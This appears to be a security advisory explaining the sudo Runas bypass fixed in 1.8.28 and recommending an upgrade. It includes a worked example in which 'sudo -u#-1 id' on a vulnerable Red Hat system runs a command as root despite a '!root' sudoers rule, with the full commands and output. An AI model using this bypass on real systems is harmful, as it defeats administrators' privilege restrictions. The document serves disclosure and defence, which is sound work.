Background
A vulnerability affecting versions of sudo prior to 1.8.28 has been resolved. This vulnerability allows users with sudo privileges restricting root access within the Runas specification to circumvent this control and execute commands as root users if the “ALL” keyword comes first in the Runas specification. This can be achieved by specifying the user ID -1 or 4294967295
The impact of this vulnerability depends on your usage of the /etc/sudoers file. In environments that do not utilise sudo it will present minimal risk, in others it may present a significant risk. In order to be safe it is recommended that you update your version of sudo to at least version 1.8.28.
There is a full write-up of this issue here: https://www.sudo.ws/alerts/minus_1_uid.html
Worked Example
Sudo Overview
The syntax used in the /etc/sudoers file is as follows:
user host = (user) commandThe first column defines the user/group the entry applies to, the host and user sections defines the host and users the command applies to. Finally the command specifies the command. The following entry is commonly seen in Debian /etc/sudoers files allowing members of the admin group to run all commands as all users on all hosts:
%admin ALL=(ALL) ALLUnless the “NOPASSWD” option is set this will prompt the user for a password. Where this issue becomes interesting is when the /etc/sudoers entry contains “!root” because this vulnerability can be utilised to circumvent this control…
Example
In this example we have the following entry in our /etc/sudoers file which should allow us to run the /usr/bin/id command as any user except root and will require our user password in order to do so:
test ALL=(ALL, !root) /usr/bin/idInitially running “id” without sudo gives the following output:
$ id
uid=1001(test) gid=1001(test) groups=1001(test)When specifying a user id other than our own we get prompted for our password and the command executes, all as expected:
$ sudo -u#1000 id
[sudo] password for test:
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)When running as root this command as root the following error is returned as a result of the “!root” specification in the /etc/sudoers file:
$ sudo id
Sorry, user test is not allowed to execute '/bin/id' as root on testsystem.However, by specifying the user ID -1 we are able to circumvent this control and execute this command as root:
$ sudo -u#-1 id
uid=0(root) gid=1001(test) groups=1001(test)This example was run on a Red Hat system with the following version information:
$ sudo --version
Sudo version 1.8.19p2
Sudoers policy plugin version 1.8.19p2
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.19p2
$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.4 (Maipo)
$ uname -a
Linux lsfmaster 3.10.0-693.11.6.el7.x86_64 #1 SMP Thu Dec 28 14:23:39 EST 2017 x86_64 x86_64 x86_64 GNU/Linux